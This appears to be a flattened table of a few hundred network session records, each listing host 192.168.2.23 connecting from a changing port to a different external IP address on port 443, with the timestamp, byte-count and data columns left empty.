                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22782192.168.2.2360660172.250.121.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22783192.168.2.2336828165.130.128.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22784192.168.2.2351298105.232.170.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22785192.168.2.2358208133.63.76.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22786192.168.2.2356790136.189.245.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22787192.168.2.2355080142.182.168.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22788192.168.2.234097231.131.18.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22789192.168.2.2348396139.165.50.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22790192.168.2.2338950108.107.151.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22791192.168.2.2337144104.27.77.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22792192.168.2.234383050.38.81.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22793192.168.2.233450273.214.76.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22794192.168.2.2352054207.119.167.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22795192.168.2.2342274133.7.153.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22796192.168.2.234584037.148.84.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22797192.168.2.2347516190.145.54.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22798192.168.2.2347838168.196.237.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22799192.168.2.2357878199.217.180.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22800192.168.2.2343702169.79.134.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22801192.168.2.2339422108.199.168.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22802192.168.2.233456258.81.62.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22803192.168.2.233636438.164.240.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22804192.168.2.2350702156.103.140.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22805192.168.2.2352098115.225.242.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22806192.168.2.2340214159.223.131.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22807192.168.2.234267469.106.0.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22808192.168.2.2342862173.255.244.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22809192.168.2.2334284113.14.138.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22810192.168.2.234665619.208.179.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22811192.168.2.2353860164.71.187.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22812192.168.2.2352940208.66.170.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22813192.168.2.2360150111.121.156.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22814192.168.2.234712057.62.24.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22815192.168.2.2359108183.44.172.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22816192.168.2.2355550216.138.184.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22817192.168.2.2349844211.104.237.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22818192.168.2.234484636.211.0.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22819192.168.2.2342678205.151.229.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22820192.168.2.235193851.58.124.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22821192.168.2.233324876.100.127.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22822192.168.2.2342972160.108.252.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22823192.168.2.2334204200.255.209.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22824192.168.2.2350994154.56.242.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22825192.168.2.233886292.156.163.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22826192.168.2.2345712148.95.220.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22827192.168.2.2341718193.108.16.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22828192.168.2.2333852148.67.35.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22829192.168.2.2351036212.33.88.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22830192.168.2.233774449.251.21.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22831192.168.2.234512694.55.252.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22832192.168.2.234768866.0.59.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22833192.168.2.233628419.139.154.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22834192.168.2.234184497.116.226.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22835192.168.2.235669664.204.92.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22836192.168.2.23334889.43.25.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22837192.168.2.23458524.144.60.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22838192.168.2.2335942153.108.76.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22839192.168.2.2343476108.207.62.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22840192.168.2.2356130110.185.196.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22841192.168.2.2339748165.110.139.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22842192.168.2.2359726136.254.111.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22843192.168.2.2338234165.186.237.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22844192.168.2.233646872.165.196.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22845192.168.2.233640480.136.185.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22846192.168.2.2346156103.125.184.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22847192.168.2.235068235.30.229.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22848192.168.2.236008231.218.10.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22849192.168.2.2359632189.216.72.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22850192.168.2.2350498205.240.117.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22851192.168.2.234944625.149.42.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22852192.168.2.2356870144.31.157.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22853192.168.2.2355682159.56.158.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22854192.168.2.2340000196.28.216.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22855192.168.2.2348790147.154.104.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22856192.168.2.2350432109.124.185.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22857192.168.2.2355786183.203.199.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22858192.168.2.2353750204.112.109.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22859192.168.2.2346976167.178.151.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22860192.168.2.235377493.4.232.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22861192.168.2.2358680123.82.213.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22862192.168.2.2340004174.118.158.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22863192.168.2.2355704152.50.36.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22864192.168.2.234486613.57.208.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22865192.168.2.234354669.211.74.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22866192.168.2.2342584205.3.48.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22867192.168.2.2345846159.169.126.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22868192.168.2.2336790206.243.101.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22869192.168.2.2336358101.62.32.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22870192.168.2.2338162179.112.249.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22871192.168.2.2355544143.81.39.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22872192.168.2.235328493.160.198.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22873192.168.2.233367678.44.137.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22874192.168.2.2350910159.58.165.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22875192.168.2.234962014.194.115.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22876192.168.2.2349278193.34.100.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22877192.168.2.2333538112.174.93.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22878192.168.2.235802270.31.3.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22879192.168.2.2359950107.8.53.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22880192.168.2.235944897.56.195.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22881192.168.2.2360620186.109.219.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22882192.168.2.234615639.105.15.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22883192.168.2.2346296186.111.35.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22884192.168.2.2359856197.158.155.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22885192.168.2.2338510171.98.134.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22886192.168.2.2348138183.98.247.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22887192.168.2.2335680173.200.216.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22888192.168.2.2340928150.62.72.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22889192.168.2.233975236.19.252.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22890192.168.2.2351382217.127.108.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22891192.168.2.2346578217.204.216.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22892192.168.2.2348950204.248.243.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22893192.168.2.2350250209.229.225.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22894192.168.2.2358672175.240.71.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22895192.168.2.2351814126.178.122.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22896192.168.2.2338484112.144.182.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22897192.168.2.235030082.26.142.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22898192.168.2.2348236210.45.117.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22899192.168.2.2340148155.39.21.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22900192.168.2.236049070.102.242.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22901192.168.2.234779223.188.42.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22902192.168.2.23493982.91.189.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22903192.168.2.2338576113.177.171.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22904192.168.2.2345084100.216.116.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22905192.168.2.2343734190.19.168.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22906192.168.2.2357084138.194.14.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22907192.168.2.2340560187.93.45.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22908192.168.2.233547439.60.228.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22909192.168.2.234215896.93.245.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22910192.168.2.235195495.223.134.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22911192.168.2.2355906171.96.40.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22912192.168.2.234453469.245.137.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22913192.168.2.23533649.243.1.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22914192.168.2.235018690.50.203.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22915192.168.2.2359708121.55.82.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22916192.168.2.2337934115.146.126.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22917192.168.2.2350350140.22.240.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22918192.168.2.234939024.218.44.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22919192.168.2.2337166168.20.235.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22920192.168.2.2350366163.103.26.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22921192.168.2.2333838194.2.150.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22922192.168.2.2348426191.213.188.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22923192.168.2.2345062175.46.160.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22924192.168.2.2347738177.37.178.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22925192.168.2.2344950155.225.229.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22926192.168.2.2352538137.114.56.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22927192.168.2.2359686176.169.139.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22928192.168.2.2355556186.222.160.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22929192.168.2.235508417.65.32.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22930192.168.2.235539281.74.168.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22931192.168.2.2355492117.85.103.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22932192.168.2.234977219.116.254.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22933192.168.2.2353420187.113.96.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22934192.168.2.2340322142.2.39.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22935192.168.2.235939237.215.113.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22936192.168.2.2342486182.34.106.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22937192.168.2.234655058.150.197.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22938192.168.2.2334860116.117.7.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22939192.168.2.2339444107.183.220.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22940192.168.2.233724246.185.143.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22941192.168.2.234461679.118.254.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22942192.168.2.2344184148.61.118.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22943192.168.2.2358662160.114.154.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22944192.168.2.2355290187.95.137.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22945192.168.2.234509667.57.176.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22946192.168.2.2346486144.231.21.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22947192.168.2.233803065.164.186.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22948192.168.2.234514851.109.120.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22949192.168.2.234822857.137.130.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22950192.168.2.235277288.194.209.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22951192.168.2.233831831.79.143.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22952192.168.2.2349438207.111.96.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22953192.168.2.2334690185.177.85.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22954192.168.2.2340900120.255.159.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22955192.168.2.2343740128.130.26.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22956192.168.2.2358978119.209.234.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22957192.168.2.2339426167.116.170.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22958192.168.2.2344852203.6.82.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22959192.168.2.235182094.227.121.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22960192.168.2.233406439.110.168.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22961192.168.2.233314265.76.162.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22962192.168.2.23573869.11.192.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22963192.168.2.2360174111.56.33.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22964192.168.2.2338174112.194.210.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22965192.168.2.2356920216.130.81.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22966192.168.2.2339888129.150.11.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22967192.168.2.2352862110.179.234.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22968192.168.2.2347552160.70.242.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22969192.168.2.2346878129.122.240.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22970192.168.2.235242264.231.67.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22971192.168.2.2348950204.124.214.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22972192.168.2.235085686.35.209.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22973192.168.2.23389982.42.193.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22974192.168.2.2351118177.56.221.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22975192.168.2.2340932170.26.130.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22976192.168.2.2357400124.113.82.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22977192.168.2.2349216216.131.79.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22978192.168.2.2340224156.141.228.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22979192.168.2.234510642.73.130.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22980192.168.2.2351284122.210.117.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22981192.168.2.235583669.76.88.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22982192.168.2.236050636.136.209.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22983192.168.2.233995838.56.248.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22984192.168.2.233711292.252.140.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22985192.168.2.2357714200.138.247.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22986192.168.2.2359196194.87.82.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22987192.168.2.2333900104.119.175.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22988192.168.2.2358918141.1.88.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22989192.168.2.235745081.80.192.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22990192.168.2.235068451.128.62.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22991192.168.2.234350064.21.94.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22992192.168.2.2351638186.40.235.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22993192.168.2.2360782177.88.132.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22994192.168.2.233685065.200.200.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22995192.168.2.2347712169.128.88.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22996192.168.2.2342854204.153.174.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22997192.168.2.234716643.115.246.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22998192.168.2.2356206112.104.243.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22999192.168.2.2352776131.188.142.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23000192.168.2.235921268.193.135.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23001192.168.2.2342840223.36.105.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23002192.168.2.235636086.137.214.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23003192.168.2.2360548112.31.179.168443
